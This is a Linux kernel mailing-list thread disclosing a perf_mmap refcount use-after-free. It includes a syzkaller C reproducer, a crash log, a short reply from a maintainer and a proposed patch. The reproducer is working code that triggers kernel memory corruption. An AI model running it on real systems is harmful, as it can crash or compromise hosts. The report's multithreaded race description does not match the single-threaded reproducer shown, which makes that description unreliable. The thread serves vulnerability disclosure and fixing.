uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
On Sat, Jan 31, 2026 at 09:21:23PM +0800, 余昊铖 wrote:
Can you turn this into a patch we can apply (properly sent, real name
used, etc.) so that the maintainers can review it and apply it
correctly?
Also, be sure to send this to the correct people, I don't think that
the ext4 developers care that much about perf :)
thanks,
greg k-h
|
{
"author": "Greg KH <gregkh@linuxfoundation.org>",
"date": "Sun, 1 Feb 2026 09:18:40 +0100",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
|
Hello,
I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed.
Summary
-------
A local user can trigger reference count saturation or a use-after-free (UAF) in the perf_mmap function. This is caused by a race condition in which a ring_buffer object's reference count is incremented after it has already reached zero.
The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later.
I verified this on Linux kernel version 6.18.5.
Environment
-----------
- Kernel version: 6.18.5 (the complete config is attached)
- Architecture: x86_64
- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)
Symptoms and logs
-----------------
The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning, followed by a memory leak warning.
The full report is as follows:
audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff888103c17678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c
RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88
RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2
R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000
R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170
FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0
DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2
DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600
PKRU: 80000000
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f7ef5cabb9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d
RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer and then drops it. Meanwhile, thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering reference count saturation or a use-after-free (UAF) condition. The immediate symptom is typically a kernel warning or a denial of service through a system hang or panic, especially in environments with panic_on_warn enabled, but the underlying memory corruption is a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage the UAF state for heap grooming: if the freed memory is reallocated with an attacker-controlled structure, the bug could potentially be exploited for local privilege escalation. This makes it a critical issue for multi-user systems and containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
